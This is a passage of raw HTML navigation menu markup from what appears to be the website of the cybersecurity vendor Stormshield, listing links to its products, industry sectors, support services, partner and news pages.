ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/data-protection/data-encryption-in-microsoft365/"><span class="ubermenu-target-title ubermenu-target-text">Data encryption in SharePoint and OneDrive</span></a></li><li id="menu-item-316129" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-316129 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/data-protection/data-encryption-on-workstations/"><span class="ubermenu-target-title ubermenu-target-text">Data encryption on workstations</span></a></li><li id="menu-item-316130" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-316130 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/data-protection/sds-range/"><span class="ubermenu-target-title ubermenu-target-text">SDS range</span></a></li></ul></li><!-- end Segment: 2012 --><!-- begin Segment: Menu ID 6853 --><li id="menu-item-238837" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-238837 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-icon_left" href="https://www.stormshield.com/products-services/products/operational-protection/"><span class="ubermenu-target-title ubermenu-target-text">Operational security</span></a><ul  class="ubermenu-submenu ubermenu-submenu-id-238837 ubermenu-submenu-type-auto ubermenu-submenu-type-stack"  ><li id="menu-item-238836" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-238836 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/operational-protection/our-features-ot/"><span class="ubermenu-target-title ubermenu-target-text">Features</span></a></li><li id="menu-item-238838" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-238838 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/operational-protection/our-range-ot/"><span class="ubermenu-target-title ubermenu-target-text">Product range</span></a></li></ul></li><!-- end Segment: 6853 --><li class="ubermenu-divider"><hr/></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li><li id="menu-item-20992" class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-20992 ubermenu-item-header ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/buy-a-solution/"><span class="ubermenu-target-title ubermenu-target-text">Buy a solution</span></a></li></ul></li><!-- end Tabs: [Tabs] 22834 --><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li><li id="menu-item-232688" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-232688 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Our support</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-submenu ubermenu-submenu-id-232688 ubermenu-submenu-type-auto ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-full_width"  ><!-- begin Tabs: [Tabs] 238873 --><li id="menu-item-238873" class="ubermenu-item ubermenu-tabs ubermenu-item-238873 ubermenu-item-level-1 ubermenu-column ubermenu-column-full ubermenu-tab-layout-left ubermenu-tabs-show-default ubermenu-tabs-show-current"><ul  class="ubermenu-tabs-group ubermenu-tabs-group--trigger-mouseover ubermenu-column ubermenu-column-1-4 ubermenu-submenu ubermenu-submenu-id-238873 ubermenu-submenu-type-auto ubermenu-submenu-type-tabs-group"  ><li id="menu-item-232690" class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232690 ubermenu-item-header ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/with-our-partners/"><span class="ubermenu-target-title ubermenu-target-text">With our partners</span></a></li><li id="menu-item-20993" class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-20993 ubermenu-item-header ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/"><span class="ubermenu-target-title ubermenu-target-text">Services</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-20993 ubermenu-submenu-type-tab-content-panel"  ><li class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-item-has-children ubermenu-item-23008 ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-23008"><ul  class="ubermenu-submenu ubermenu-submenu-id-23008 ubermenu-submenu-type-stack"  ><li id="menu-item-232692" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232692 ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/maintenance/"><span class="ubermenu-target-title ubermenu-target-text">Maintenance</span></a></li><li id="menu-item-232694" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232694 ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/technical-support/"><span class="ubermenu-target-title ubermenu-target-text">Technical Support</span></a></li><li id="menu-item-232693" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232693 ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/training/"><span class="ubermenu-target-title ubermenu-target-text">Training</span></a></li></ul></li><li class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-item-has-children ubermenu-item-23009 ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-23009"><ul  class="ubermenu-submenu ubermenu-submenu-id-23009 ubermenu-submenu-type-stack"  ><li id="menu-item-232687" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232687 ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/professional-services/"><span class="ubermenu-target-title ubermenu-target-text">Professional Services</span></a></li><li id="menu-item-232686" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232686 ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/cyber-threat-intelligence/"><span class="ubermenu-target-title ubermenu-target-text">Threat Intelligence</span></a></li><li id="menu-item-232689" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232689 ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/our-support/services/stormshield-academy/"><span class="ubermenu-target-title ubermenu-target-text">Stormshield Academy</span></a></li></ul></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li><li id="menu-item-149000" class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-149000 ubermenu-item-header ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/resource-center/"><span class="ubermenu-target-title ubermenu-target-text">Marketing documentation</span></a></li><li id="menu-item-149001" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-149001 ubermenu-item-header ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://documentation.stormshield.eu/HOME/Content/Website_Topics/Root-HomePage-EN.htm"><span class="ubermenu-target-title ubermenu-target-text">Technical documentation</span></a></li><li id="menu-item-232691" class="ubermenu-tab ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-232691 ubermenu-item-header ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/tag/cybersecurity-first-steps/"><span class="ubermenu-target-title ubermenu-target-text">Cybersecurity, first steps</span></a></li></ul></li><!-- end Tabs: [Tabs] 238873 --><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li><li id="menu-item-156" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-156 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-flyout" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/partner/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Partner</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-submenu ubermenu-submenu-id-156 ubermenu-submenu-type-flyout ubermenu-submenu-drop ubermenu-submenu-align-left_edge_item"  ><li id="menu-item-35603" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-35603 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/partner/"><span class="ubermenu-target-title ubermenu-target-text">Why become a partner</span></a></li><li id="menu-item-22113" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-22113 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/partner/apply-for-a-partnership/"><span class="ubermenu-target-title ubermenu-target-text">Join our network</span></a></li><li id="menu-item-22116" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-22116 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/partner/partner-finder/"><span class="ubermenu-target-title ubermenu-target-text">All our partners</span></a></li><li id="menu-item-232827" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232827 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/partner/supporting-your-customers/"><span class="ubermenu-target-title ubermenu-target-text">Supporting your customers</span></a></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li><li id="menu-item-159" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-159 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-flyout" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/news/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">News</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-submenu ubermenu-submenu-id-159 ubermenu-submenu-type-flyout ubermenu-submenu-drop ubermenu-submenu-align-left_edge_item"  ><li id="menu-item-235880" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-235880 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/tag/cybersecurity-by-stormshield/"><span class="ubermenu-target-title ubermenu-target-text">Cybersecurity, by Stormshield</span></a></li><li id="menu-item-235879" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-235879 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/tag/cybersecurity-first-steps/"><span class="ubermenu-target-title ubermenu-target-text">Cybersecurity, first steps</span></a></li><li class="ubermenu-divider"><hr/></li><li id="menu-item-21096" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21096 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/corporate/"><span class="ubermenu-target-title ubermenu-target-text">Corporate</span></a></li><li id="menu-item-21101" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21101 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/recruitment-news/"><span class="ubermenu-target-title ubermenu-target-text">Recruitment news</span></a></li><li id="menu-item-21099" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21099 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/partner-news/"><span class="ubermenu-target-title ubermenu-target-text">Partner news</span></a></li><li id="menu-item-21100" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21100 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/products-services/"><span class="ubermenu-target-title ubermenu-target-text">Products &amp; Services</span></a></li><li id="menu-item-21095" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21095 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/alert/"><span class="ubermenu-target-title ubermenu-target-text">Alert</span></a></li><li id="menu-item-21102" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21102 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/security-monitoring/"><span class="ubermenu-target-title ubermenu-target-text">Security Monitoring</span></a></li><li id="menu-item-21098" class="ubermenu-item ubermenu-item-type-taxonomy ubermenu-item-object-category ubermenu-item-21098 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/opinion-articles/"><span class="ubermenu-target-title ubermenu-target-text">Opinion articles</span></a></li><li id="menu-item-278650" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-278650 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-1" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/category/thisissecurity/"><span class="ubermenu-target-title ubermenu-target-text">Technical posts</span></a></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li></ul></nav>
<!-- End UberMenu -->
							</nav>
														<nav class="mobile_menu">
	
<!-- UberMenu [Configuration:main] [Theme Loc:top-navigation] [Integration:auto] -->
<a class="ubermenu-responsive-toggle ubermenu-responsive-toggle-main ubermenu-skin-white ubermenu-loc-top-navigation ubermenu-responsive-toggle-content-align-left ubermenu-responsive-toggle-align-full " tabindex="0" data-ubermenu-target="ubermenu-main-5-top-navigation-4"  ><i class="fas fa-bars" ></i>Menu</a><nav id="ubermenu-main-5-top-navigation-4" class="ubermenu ubermenu-nojs ubermenu-main ubermenu-menu-5 ubermenu-loc-top-navigation ubermenu-responsive ubermenu-responsive-default ubermenu-responsive-collapse ubermenu-horizontal ubermenu-transition-shift ubermenu-trigger-hover_intent ubermenu-skin-white  ubermenu-bar-align-full ubermenu-items-align-left ubermenu-bound ubermenu-disable-submenu-scroll ubermenu-sub-indicators ubermenu-retractors-responsive ubermenu-submenu-indicator-closes"><ul id="ubermenu-nav-main-5-top-navigation" class="ubermenu-nav" data-title="menu_principal"><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-238871 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/what-differentiates-us/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Our difference</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-45 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Our solutions &#038; products</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-submenu ubermenu-submenu-id-45 ubermenu-submenu-type-auto ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-full_width"  ><!-- begin Tabs: [Tabs] 22834 --><li class="ubermenu-item ubermenu-tabs ubermenu-item-22834 ubermenu-item-level-1 ubermenu-column ubermenu-column-full ubermenu-tab-layout-left ubermenu-tabs-show-default ubermenu-tabs-show-current"><ul  class="ubermenu-tabs-group ubermenu-tabs-group--trigger-mouseover ubermenu-column ubermenu-column-1-4 ubermenu-submenu ubermenu-submenu-id-22834 ubermenu-submenu-type-auto ubermenu-submenu-type-tabs-group"  ><li class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233334 ubermenu-item-header ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/tailored-to-your-needs/"><span class="ubermenu-target-title ubermenu-target-text">Tailored to your needs</span></a></li><li class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-135 ubermenu-item-header ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/"><span class="ubermenu-target-title ubermenu-target-text">By industry</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-135 ubermenu-submenu-type-tab-content-panel"  ><li class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-item-has-children ubermenu-item-23005 ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-23005"><ul  class="ubermenu-submenu ubermenu-submenu-id-23005 ubermenu-submenu-type-stack"  ><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233019 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/aviation/"><span class="ubermenu-target-title ubermenu-target-text">Aviation</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-143 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/public-administration-and-government/"><span class="ubermenu-target-title ubermenu-target-text">Public Administration and Government</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233023 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/critical-communication/"><span class="ubermenu-target-title ubermenu-target-text">Critical communication</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-140 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/defense-and-military-organizations/"><span class="ubermenu-target-title ubermenu-target-text">Defense and Military Organizations</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233024 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/water-industry/"><span class="ubermenu-target-title ubermenu-target-text">Water Industry</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233022 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/facility-management-warehouse/"><span class="ubermenu-target-title ubermenu-target-text">Facility Management &#038; Warehouse</span></a></li></ul></li><li class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-ubermenu-custom ubermenu-item-has-children ubermenu-item-23006 ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack ubermenu-item-type-column ubermenu-column-id-23006"><ul  class="ubermenu-submenu ubermenu-submenu-id-23006 ubermenu-submenu-type-stack"  ><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233025 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/electric-utilities/"><span class="ubermenu-target-title ubermenu-target-text">Electric utilities</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233020 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/navy/"><span class="ubermenu-target-title ubermenu-target-text">Navy</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-137 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/health-and-healthcare-facilities/"><span class="ubermenu-target-title ubermenu-target-text">Health and Healthcare Facilities</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-233021 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/land-transport/"><span class="ubermenu-target-title ubermenu-target-text">Land transport</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-136 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-4 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/by-industry/mssps-and-other-service-providers/"><span class="ubermenu-target-title ubermenu-target-text">MSSPs and Other Service Providers</span></a></li></ul></li><li class="ubermenu-retractor ubermenu-retractor-mobile"><i class="fas fa-times"></i> Close</li></ul></li><li class="ubermenu-tab ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-238959 ubermenu-item-header ubermenu-column ubermenu-column-full ubermenu-has-submenu-drop" data-ubermenu-trigger="mouseover" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/"><span class="ubermenu-target-title ubermenu-target-text">All our products</span><i class='ubermenu-sub-indicator fas fa-angle-down'></i></a><ul  class="ubermenu-tab-content-panel ubermenu-column ubermenu-column-3-4 ubermenu-submenu ubermenu-submenu-id-238959 ubermenu-submenu-type-tab-content-panel"  ><!-- begin Segment: Menu ID 2008 --><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-22456 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-icon_left" href="https://www.stormshield.com/products-services/products/network-security/"><span class="ubermenu-target-title ubermenu-target-text">Network security</span></a><ul  class="ubermenu-submenu ubermenu-submenu-id-22456 ubermenu-submenu-type-auto ubermenu-submenu-type-stack ubermenu-autoclear"  ><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232406 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/network-security/product-range-sns/"><span class="ubermenu-target-title ubermenu-target-text">Hardware firewalls</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-278814 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/network-security/product-range-sns/elastic-virtual-appliances/"><span class="ubermenu-target-title ubermenu-target-text">Virtual Appliances</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-364659 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/network-security/administration-tools-sns-firewalls/"><span class="ubermenu-target-title ubermenu-target-text">Administration tools</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-364666 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/network-security/our-features-sns/vpn-client/"><span class="ubermenu-target-title ubermenu-target-text">VPN Client</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232404 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/network-security/our-features-sns/"><span class="ubermenu-target-title ubermenu-target-text">Features</span></a></li><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232407 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-7 ubermenu-column ubermenu-column-full" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://www.stormshield.com/products-services/products/network-security/firewall-comparison/"><span class="ubermenu-target-title ubermenu-target-text">Firewall comparison</span></a></li></ul></li><!-- end Segment: 2008 --><!-- begin Segment: Menu ID 2013 --><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-has-children ubermenu-item-232477 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-3 ubermenu-column ubermenu-column-1-2 ubermenu-has-submenu-stack" ><a class="ubermenu-target ubermenu-item-layout-icon_left" href="https://www.stormshield.com/products-services/products/endpoint-protection/"><span class="ubermenu-target-title ubermenu-target-text">Endpoint security</span></a><ul  class="ubermenu-submenu ubermenu-submenu-id-232477 ubermenu-submenu-type-auto ubermenu-submenu-type-stack"  ><li class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-232475 